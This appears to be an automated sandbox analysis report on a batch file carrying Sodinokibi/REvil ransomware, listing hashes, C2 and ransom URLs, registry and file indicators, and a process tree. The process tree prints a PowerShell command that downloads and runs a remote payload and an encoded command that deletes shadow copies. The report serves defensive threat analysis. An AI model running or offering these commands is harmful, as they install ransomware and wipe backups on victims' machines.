Analysis
-
max time kernel
29s -
max time network
52s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
04-05-2020 09:10
Static task
static1
Behavioral task
behavioral1
Sample
Evb87yyM.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
Evb87yyM.bat
Resource
win10v200430
General
-
Target
Evb87yyM.bat
-
Size
190B
-
MD5
8e4d79c1afbe60f75e7f18f5e125dd5e
-
SHA1
45a3951131e3b20026690d0d5f3ce0a84d633e31
-
SHA256
46f6f9a88c6598831db0c71784a9cce294f3647121cba6e7dafe783523aac095
-
SHA512
3b56433e7e0f688e1c39dac8e3c12e1537ca8c6c6f8dd24cb780ec8d24f6d21c2381eacb1ae4a0785a826f207e8606e3ded0ab904fe86cff10d45c67efa3f3a2
Malware Config
Extracted
http://185.103.242.78/pastes/Evb87yyM
Extracted
C:\2gq13331ju-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/48C1B3A143AB7DAE
http://decryptor.cc/48C1B3A143AB7DAE
Signatures
-
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\x5g3e965r965.bmp" powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1292 powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 888 wrote to memory of 1292 888 cmd.exe powershell.exe PID 1292 wrote to memory of 784 1292 powershell.exe powershell.exe PID 1292 wrote to memory of 784 1292 powershell.exe powershell.exe PID 1292 wrote to memory of 784 1292 powershell.exe powershell.exe PID 1292 wrote to memory of 784 1292 powershell.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1292 powershell.exe Token: SeDebugPrivilege 1292 powershell.exe Token: SeDebugPrivilege 784 powershell.exe Token: SeBackupPrivilege 1724 vssvc.exe Token: SeRestorePrivilege 1724 vssvc.exe Token: SeAuditPrivilege 1724 vssvc.exe Token: SeTakeOwnershipPrivilege 1292 powershell.exe -
Makes http(s) request 1 IoCs
Contacts server via http/https, possibly for C2 communication.
Processes:
description flow ioc HTTP URL 1 http://185.103.242.78/pastes/Evb87yyM -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 784 powershell.exe 784 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 1 1292 powershell.exe -
Drops file in Program Files directory 16 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\SaveOut.scf powershell.exe File opened for modification \??\c:\program files\SubmitRestart.emz powershell.exe File opened for modification \??\c:\program files\UnpublishGroup.emz powershell.exe File opened for modification \??\c:\program files\OutRegister.potx powershell.exe File opened for modification \??\c:\program files\RedoUpdate.ppt powershell.exe File opened for modification \??\c:\program files\EnableCompress.eps powershell.exe File opened for modification \??\c:\program files\LimitRestore.xlt powershell.exe File created \??\c:\program files\microsoft sql server compact edition\2gq13331ju-readme.txt powershell.exe File opened for modification \??\c:\program files\TraceLock.mov powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\2gq13331ju-readme.txt powershell.exe File created \??\c:\program files\2gq13331ju-readme.txt powershell.exe File created \??\c:\program files (x86)\2gq13331ju-readme.txt powershell.exe File opened for modification \??\c:\program files\NewResume.vdx powershell.exe File opened for modification \??\c:\program files\StartConfirm.htm powershell.exe File opened for modification \??\c:\program files\SyncGrant.mpeg powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\2gq13331ju-readme.txt powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Evb87yyM.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:888 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/Evb87yyM');Invoke-FLEYEFI;Start-Sleep -s 10000"2⤵
- Sets desktop wallpaper using registry
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Drops file in Program Files directory
PID:1292 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:784
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1724